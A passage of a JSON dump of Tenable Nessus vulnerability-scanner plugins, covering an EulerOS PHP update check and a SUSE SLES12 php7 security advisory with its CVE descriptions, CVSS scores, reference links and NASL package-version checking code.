files. A remote\n attacker with the ability to upload a malicious image\n could crash PHP, causing a Denial of\n Service.(CVE-2016-10158)\n\n - Integer overflow in the phar_parse_pharfile function in\n ext/phar/phar.c in PHP before 5.6.30 and 7.0.x before\n 7.0.15 allows remote attackers to cause a denial of\n service (memory consumption or application crash) via a\n truncated manifest entry in a PHAR\n archive.(CVE-2016-10159)\n\n - The php_url_parse_ex function in ext/standard/url.c in\n PHP before 5.5.38 allows remote attackers to cause a\n denial of service (buffer over-read) or possibly have\n unspecified other impact via vectors involving the\n smart_str data type.(CVE-2016-6288)\n\n - The exif_process_IFD_in_MAKERNOTE function in\n ext/exif/exif.c in PHP before 5.5.38, 5.6.x before\n 5.6.24, and 7.x before 7.0.9 allows remote attackers to\n cause a denial of service (out-of-bounds array access\n and memory corruption), obtain sensitive information\n from process memory, or possibly have unspecified other\n impact via a crafted JPEG image.(CVE-2016-6291)\n\n - The exif_process_user_comment function in\n ext/exif/exif.c in PHP before 5.5.38, 5.6.x before\n 5.6.24, and 7.x before 7.0.9 allows remote attackers to\n cause a denial of service (NULL pointer dereference and\n application crash) via a crafted JPEG\n image.(CVE-2016-6292)\n\n - The locale_accept_from_http function in\n ext/intl/locale/locale_methods.c in PHP before 5.5.38,\n 5.6.x before 5.6.24, and 7.x before 7.0.9 does not\n properly restrict calls to the ICU\n uloc_acceptLanguageFromHTTP function, which allows\n remote attackers to cause a denial of service\n (out-of-bounds read) or possibly have unspecified other\n impact via a call with a long argument.(CVE-2016-6294)\n\n - ext/session/session.c in PHP before 5.6.25 and 7.x\n before 7.0.10 skips invalid session names in a way that\n triggers incorrect parsing, which allows remote\n attackers to inject arbitrary-type session data by\n leveraging control of a session name, as demonstrated\n by object injection.(CVE-2016-7125)\n\n - The exif_process_IFD_in_TIFF function in\n ext/exif/exif.c in PHP before 5.6.25 and 7.x before\n 7.0.10 mishandles the case of a thumbnail offset that\n exceeds the file size, which allows remote attackers to\n obtain sensitive information from process memory via a\n crafted TIFF image.(CVE-2016-7128)\n\n - The php_wddx_push_element function in ext/wddx/wddx.c\n in PHP before 5.6.26 and 7.x before 7.0.11 allows\n remote attackers to cause a denial of service (invalid\n pointer access and out-of-bounds read) or possibly have\n unspecified other impact via an incorrect boolean\n element in a wddxPacket XML document, leading to\n mishandling in a wddx_deserialize call.(CVE-2016-7418)\n\n - In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x\n before 7.1.7, a stack-based buffer overflow in the\n zend_ini_do_op() function in Zend/zend_ini_parser.c\n could cause a denial of service or potentially allow\n executing code. NOTE: this is only relevant for PHP\n applications that accept untrusted input (instead of\n the system's php.ini file) for the parse_ini_string or\n parse_ini_file function, e.g., a web application for\n syntax validation of php.ini\n directives.(CVE-2017-11628)\n\n - An issue was discovered in PHP before 5.6.35, 7.0.x\n before 7.0.29, 7.1.x before 7.1.16, and 7.2.x before\n 7.2.4. Dumpable FPM child processes allow bypassing\n opcache access controls because fpm_unix.c makes a\n PR_SET_DUMPABLE prctl call, allowing one user (in a\n multiuser environment) to obtain sensitive information\n from the process memory of a second user's PHP\n applications by running gcore on the PID of the PHP-FPM\n worker process.(CVE-2018-10545)\n\n - An issue was discovered in ext/phar/phar_object.c in\n PHP before 5.6.36, 7.0.x before 7.0.30, 7.1.x before\n 7.1.17, and 7.2.x before 7.2.5. There is Reflected XSS\n on the PHAR 403 and 404 error pages via request data of\n a request for a .phar file.(CVE-2018-10547)\n\n - exif_process_IFD_in_MAKERNOTE in ext/exif/exif.c in PHP\n before 5.6.37, 7.0.x before 7.0.31, 7.1.x before\n 7.1.20, and 7.2.x before 7.2.8 allows remote attackers\n to cause a denial of service (out-of-bounds read and\n application crash) via a crafted JPEG\n file.(CVE-2018-14851)\n\n - A cross-site scripting (XSS) vulnerability in Apache2\n component of PHP was found. When using\n 'Transfer-Encoding: chunked', the request allows remote\n attackers to potentially run a malicious script in a\n victim's browser. This vulnerability can be exploited\n only by producing malformed requests and it's believed\n it's unlikely to be used in practical cross-site\n scripting attack.(CVE-2018-17082)\n\n - gd_gif_in.c in the GD Graphics Library (aka libgd), as\n used in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x\n before 7.1.13, and 7.2.x before 7.2.1, has an integer\n signedness error that leads to an infinite loop via a\n crafted GIF file, as demonstrated by a call to the\n imagecreatefromgif or imagecreatefromstring PHP\n function. This is related to GetCode_ and\n gdImageCreateFromGifCtx.(CVE-2018-5711)\n\n - An issue was discovered in PHP before 5.6.33, 7.0.x\n before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before\n 7.2.1. There is Reflected XSS on the PHAR 404 error\n page via the URI of a request for a .phar\n file.(CVE-2018-5712)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1984\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fa8a4c3f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(5)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"php-5.4.16-45.h15.eulerosv2r7\",\n \"php-cli-5.4.16-45.h15.eulerosv2r7\",\n \"php-common-5.4.16-45.h15.eulerosv2r7\",\n \"php-gd-5.4.16-45.h15.eulerosv2r7\",\n \"php-ldap-5.4.16-45.h15.eulerosv2r7\",\n \"php-mysql-5.4.16-45.h15.eulerosv2r7\",\n \"php-odbc-5.4.16-45.h15.eulerosv2r7\",\n \"php-pdo-5.4.16-45.h15.eulerosv2r7\",\n \"php-pgsql-5.4.16-45.h15.eulerosv2r7\",\n \"php-process-5.4.16-45.h15.eulerosv2r7\",\n \"php-recode-5.4.16-45.h15.eulerosv2r7\",\n \"php-soap-5.4.16-45.h15.eulerosv2r7\",\n \"php-xml-5.4.16-45.h15.eulerosv2r7\",\n \"php-xmlrpc-5.4.16-45.h15.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"5\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:46", "description": "This update for php7 fixes the following security issues :\n\n - CVE-2016-6128: Invalid color index not properly handled [bsc#987580]\n\n - CVE-2016-6161: global out of bounds read when encoding gif from malformed input withgd2togif [bsc#988032]\n\n - CVE-2016-6292: NULL pointer dereference in exif_process_user_comment [bsc#991422]\n\n - CVE-2016-6295: Use after free in SNMP with GC and unserialize() [bsc#991424]\n\n - CVE-2016-6297: Stack-based buffer overflow vulnerability in php_stream_zip_opener [bsc#991426]\n\n - CVE-2016-6291: Out-of-bounds access in exif_process_IFD_in_MAKERNOTE [bsc#991427]\n\n - CVE-2016-6289: Integer overflow leads to buffer overflow in virtual_file_ex [bsc#991428]\n\n - CVE-2016-6290: Use after free in unserialize() with Unexpected Session Deserialization [bsc#991429]\n\n - CVE-2016-5399: Improper error handling in bzread() [bsc#991430]\n\n - CVE-2016-6296: Heap buffer overflow vulnerability in simplestring_addn in simplestring.c [bsc#991437]\n\n - CVE-2016-6207: Integer overflow error within\n _gdContributionsAlloc() [bsc#991434]\n\n - CVE-2016-4473: Invalid free() instead of efree() in phar_extract_file()\n\n - CVE-2016-7124: Create an Unexpected Object and Don't Invoke __wakeup() in Deserialization\n\n - CVE-2016-7125: PHP Session Data Injection Vulnerability\n\n - CVE-2016-7126: select_colors write out-of-bounds\n\n - CVE-2016-7127: imagegammacorrect allowed arbitrary write access\n\n - CVE-2016-7128: Memory Leakage In exif_process_IFD_in_TIFF\n\n - CVE-2016-7129: wddx_deserialize allowed illegal memory access\n\n - CVE-2016-7131: wddx_deserialize null dereference with invalid xml\n\n - CVE-2016-7132: wddx_deserialize null dereference in php_wddx_pop_element\n\n - CVE-2016-7133: memory allocator fails to realloc small block to large one\n\n - CVE-2016-7134: Heap overflow in the function curl_escape\n\n - CVE-2016-7130: wddx_deserialize null dereference\n\n - CVE-2016-7413: Use after free in wddx_deserialize\n\n - CVE-2016-7412: Heap overflow in mysqlnd when not receiving UNSIGNED_FLAG in BIT field\n\n - CVE-2016-7417: Missing type check when unserializing SplArray\n\n - CVE-2016-7416: Stack based buffer overflow in msgfmt_format_message\n\n - CVE-2016-7418: NULL pointer dereference in php_wddx_push_element\n\n - CVE-2016-7414: Out of bounds heap read when verifying signature of zip phar in phar_parse_zipfile\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-01-02T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : php7 (SUSE-SU-2016:2460-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4473", "CVE-2016-5399", "CVE-2016-6128", "CVE-2016-6161", "CVE-2016-6207", "CVE-2016-6289", "CVE-2016-6290", "CVE-2016-6291", "CVE-2016-6292", "CVE-2016-6295", "CVE-2016-6296", "CVE-2016-6297", "CVE-2016-7124", "CVE-2016-7125", "CVE-2016-7126", "CVE-2016-7127", "CVE-2016-7128", "CVE-2016-7129", "CVE-2016-7130", "CVE-2016-7131", "CVE-2016-7132", "CVE-2016-7133", "CVE-2016-7134", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:php7-dom", "p-cpe:/a:novell:suse_linux:php7-dom-debuginfo", "p-cpe:/a:novell:suse_linux:php7-enchant", "p-cpe:/a:novell:suse_linux:php7-enchant-debuginfo", "p-cpe:/a:novell:suse_linux:php7-exif", "p-cpe:/a:novell:suse_linux:php7-exif-debuginfo", "p-cpe:/a:novell:suse_linux:php7-fastcgi", "p-cpe:/a:novell:suse_linux:php7-fastcgi-debuginfo", "p-cpe:/a:novell:suse_linux:php7-fileinfo", "p-cpe:/a:novell:suse_linux:php7-fileinfo-debuginfo", "p-cpe:/a:novell:suse_linux:php7-fpm", "p-cpe:/a:novell:suse_linux:php7-fpm-debuginfo", "p-cpe:/a:novell:suse_linux:php7-ftp", "p-cpe:/a:novell:suse_linux:php7-ftp-debuginfo", "p-cpe:/a:novell:suse_linux:php7-gd", "p-cpe:/a:novell:suse_linux:php7-gd-debuginfo", "p-cpe:/a:novell:suse_linux:php7-gettext", "p-cpe:/a:novell:suse_linux:php7-gettext-debuginfo", "p-cpe:/a:novell:suse_linux:php7-gmp", "p-cpe:/a:novell:suse_linux:php7-gmp-debuginfo", "p-cpe:/a:novell:suse_linux:php7-iconv", "p-cpe:/a:novell:suse_linux:php7-iconv-debuginfo", "p-cpe:/a:novell:suse_linux:php7-imap", "p-cpe:/a:novell:suse_linux:php7-imap-debuginfo", "p-cpe:/a:novell:suse_linux:php7-intl", "p-cpe:/a:novell:suse_linux:php7-intl-debuginfo", "p-cpe:/a:novell:suse_linux:php7-json", "p-cpe:/a:novell:suse_linux:php7-json-debuginfo", "p-cpe:/a:novell:suse_linux:php7-ldap", "p-cpe:/a:novell:suse_linux:php7-ldap-debuginfo", "p-cpe:/a:novell:suse_linux:php7-mbstring", "p-cpe:/a:novell:suse_linux:php7-mbstring-debuginfo", "p-cpe:/a:novell:suse_linux:php7-mcrypt", "p-cpe:/a:novell:suse_linux:php7-mcrypt-debuginfo", "p-cpe:/a:novell:suse_linux:php7-mysql", "p-cpe:/a:novell:suse_linux:php7-mysql-debuginfo", "p-cpe:/a:novell:suse_linux:php7-odbc", "p-cpe:/a:novell:suse_linux:php7-odbc-debuginfo", "p-cpe:/a:novell:suse_linux:php7-opcache", "p-cpe:/a:novell:suse_linux:php7-opcache-debuginfo", "p-cpe:/a:novell:suse_linux:php7-openssl", "p-cpe:/a:novell:suse_linux:php7-openssl-debuginfo", "p-cpe:/a:novell:suse_linux:php7-pcntl", "p-cpe:/a:novell:suse_linux:php7-pcntl-debuginfo", "p-cpe:/a:novell:suse_linux:php7-pdo", "p-cpe:/a:novell:suse_linux:php7-pdo-debuginfo", "p-cpe:/a:novell:suse_linux:php7-pgsql", "p-cpe:/a:novell:suse_linux:php7-pgsql-debuginfo", "p-cpe:/a:novell:suse_linux:php7-phar", "p-cpe:/a:novell:suse_linux:php7-phar-debuginfo", "p-cpe:/a:novell:suse_linux:php7-posix", "p-cpe:/a:novell:suse_linux:php7-posix-debuginfo", "p-cpe:/a:novell:suse_linux:php7-pspell", "p-cpe:/a:novell:suse_linux:php7-pspell-debuginfo", "p-cpe:/a:novell:suse_linux:php7-shmop", "p-cpe:/a:novell:suse_linux:php7-shmop-debuginfo", "p-cpe:/a:novell:suse_linux:php7-snmp", "p-cpe:/a:novell:suse_linux:php7-snmp-debuginfo", "p-cpe:/a:novell:suse_linux:php7-soap", "p-cpe:/a:novell:suse_linux:php7-soap-debuginfo", "p-cpe:/a:novell:suse_linux:php7-sockets", "p-cpe:/a:novell:suse_linux:php7-sockets-debuginfo", "p-cpe:/a:novell:suse_linux:php7-sqlite", "p-cpe:/a:novell:suse_linux:php7-sqlite-debuginfo", "p-cpe:/a:novell:suse_linux:php7-sysvmsg", "p-cpe:/a:novell:suse_linux:php7-sysvmsg-debuginfo", "p-cpe:/a:novell:suse_linux:php7-sysvsem", "p-cpe:/a:novell:suse_linux:php7-sysvsem-debuginfo", "p-cpe:/a:novell:suse_linux:php7-sysvshm", "p-cpe:/a:novell:suse_linux:php7-sysvshm-debuginfo", "p-cpe:/a:novell:suse_linux:php7-tokenizer", "p-cpe:/a:novell:suse_linux:php7-tokenizer-debuginfo", "p-cpe:/a:novell:suse_linux:php7-wddx", "p-cpe:/a:novell:suse_linux:php7-wddx-debuginfo", "p-cpe:/a:novell:suse_linux:php7-xmlreader", "p-cpe:/a:novell:suse_linux:php7-xmlreader-debuginfo", "p-cpe:/a:novell:suse_linux:php7-xmlrpc", "p-cpe:/a:novell:suse_linux:php7-xmlrpc-debuginfo", "p-cpe:/a:novell:suse_linux:php7-xmlwriter", "p-cpe:/a:novell:suse_linux:php7-xmlwriter-debuginfo", "p-cpe:/a:novell:suse_linux:php7-xsl", "p-cpe:/a:novell:suse_linux:php7-xsl-debuginfo", "p-cpe:/a:novell:suse_linux:php7-zip", "p-cpe:/a:novell:suse_linux:php7-zip-debuginfo", "p-cpe:/a:novell:suse_linux:php7-zlib", "p-cpe:/a:novell:suse_linux:php7-zlib-debuginfo", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:apache2-mod_php7", "p-cpe:/a:novell:suse_linux:apache2-mod_php7-debuginfo", "p-cpe:/a:novell:suse_linux:php7", "p-cpe:/a:novell:suse_linux:php7-bcmath", "p-cpe:/a:novell:suse_linux:php7-bcmath-debuginfo", "p-cpe:/a:novell:suse_linux:php7-bz2", "p-cpe:/a:novell:suse_linux:php7-bz2-debuginfo", "p-cpe:/a:novell:suse_linux:php7-calendar", "p-cpe:/a:novell:suse_linux:php7-calendar-debuginfo", "p-cpe:/a:novell:suse_linux:php7-ctype", "p-cpe:/a:novell:suse_linux:php7-ctype-debuginfo", "p-cpe:/a:novell:suse_linux:php7-curl", "p-cpe:/a:novell:suse_linux:php7-curl-debuginfo", "p-cpe:/a:novell:suse_linux:php7-dba", "p-cpe:/a:novell:suse_linux:php7-dba-debuginfo", "p-cpe:/a:novell:suse_linux:php7-debuginfo", "p-cpe:/a:novell:suse_linux:php7-debugsource"], "id": "SUSE_SU-2016-2460-1.NASL", "href": "https://www.tenable.com/plugins/nessus/119981", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:2460-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(119981);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-4473\", \"CVE-2016-5399\", \"CVE-2016-6128\", \"CVE-2016-6161\", \"CVE-2016-6207\", \"CVE-2016-6289\", \"CVE-2016-6290\", \"CVE-2016-6291\", \"CVE-2016-6292\", \"CVE-2016-6295\", \"CVE-2016-6296\", \"CVE-2016-6297\", \"CVE-2016-7124\", \"CVE-2016-7125\", \"CVE-2016-7126\", \"CVE-2016-7127\", \"CVE-2016-7128\", \"CVE-2016-7129\", \"CVE-2016-7130\", \"CVE-2016-7131\", \"CVE-2016-7132\", \"CVE-2016-7133\", \"CVE-2016-7134\", \"CVE-2016-7412\", \"CVE-2016-7413\", \"CVE-2016-7414\", \"CVE-2016-7416\", \"CVE-2016-7417\", \"CVE-2016-7418\");\n\n script_name(english:\"SUSE SLES12 Security Update : php7 (SUSE-SU-2016:2460-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for php7 fixes the following security issues :\n\n - CVE-2016-6128: Invalid color index not properly handled\n [bsc#987580]\n\n - CVE-2016-6161: global out of bounds read when encoding\n gif from malformed input withgd2togif [bsc#988032]\n\n - CVE-2016-6292: NULL pointer dereference in\n exif_process_user_comment [bsc#991422]\n\n - CVE-2016-6295: Use after free in SNMP with GC and\n unserialize() [bsc#991424]\n\n - CVE-2016-6297: Stack-based buffer overflow vulnerability\n in php_stream_zip_opener [bsc#991426]\n\n - CVE-2016-6291: Out-of-bounds access in\n exif_process_IFD_in_MAKERNOTE [bsc#991427]\n\n - CVE-2016-6289: Integer overflow leads to buffer overflow\n in virtual_file_ex [bsc#991428]\n\n - CVE-2016-6290: Use after free in unserialize() with\n Unexpected Session Deserialization [bsc#991429]\n\n - CVE-2016-5399: Improper error handling in bzread()\n [bsc#991430]\n\n - CVE-2016-6296: Heap buffer overflow vulnerability in\n simplestring_addn in simplestring.c [bsc#991437]\n\n - CVE-2016-6207: Integer overflow error within\n _gdContributionsAlloc() [bsc#991434]\n\n - CVE-2016-4473: Invalid free() instead of efree() in\n phar_extract_file()\n\n - CVE-2016-7124: Create an Unexpected Object and Don't\n Invoke __wakeup() in Deserialization\n\n - CVE-2016-7125: PHP Session Data Injection Vulnerability\n\n - CVE-2016-7126: select_colors write out-of-bounds\n\n - CVE-2016-7127: imagegammacorrect allowed arbitrary write\n access\n\n - CVE-2016-7128: Memory Leakage In\n exif_process_IFD_in_TIFF\n\n - CVE-2016-7129: wddx_deserialize allowed illegal memory\n access\n\n - CVE-2016-7131: wddx_deserialize null dereference with\n invalid xml\n\n - CVE-2016-7132: wddx_deserialize null dereference in\n php_wddx_pop_element\n\n - CVE-2016-7133: memory allocator fails to realloc small\n block to large one\n\n - CVE-2016-7134: Heap overflow in the function curl_escape\n\n - CVE-2016-7130: wddx_deserialize null dereference\n\n - CVE-2016-7413: Use after free in wddx_deserialize\n\n - CVE-2016-7412: Heap overflow in mysqlnd when not\n receiving UNSIGNED_FLAG in BIT field\n\n - CVE-2016-7417: Missing type check when unserializing\n SplArray\n\n - CVE-2016-7416: Stack based buffer overflow in\n msgfmt_format_message\n\n - CVE-2016-7418: NULL pointer dereference in\n php_wddx_push_element\n\n - CVE-2016-7414: Out of bounds heap read when verifying\n signature of zip phar in phar_parse_zipfile\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1001950\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=987580\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=988032\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=991422\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=991424\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=991426\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=991427\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=991428\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=991429\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=991430\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=991434\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=991437\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=995512\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=997206\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=997207\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=997208\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=997210\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=997211\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=997220\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=997225\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=997230\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=997247\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=997248\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=997257\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=999313\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=999679\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=999680\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=999684\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=999685\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=999819\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=999820\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4473/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5399/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-6128/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-6161/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-6207/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-6289/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-6290/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-6291/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-6292/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-6295/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-6296/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-6297/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7124/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7125/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7126/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7127/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7128/\"\n );\n 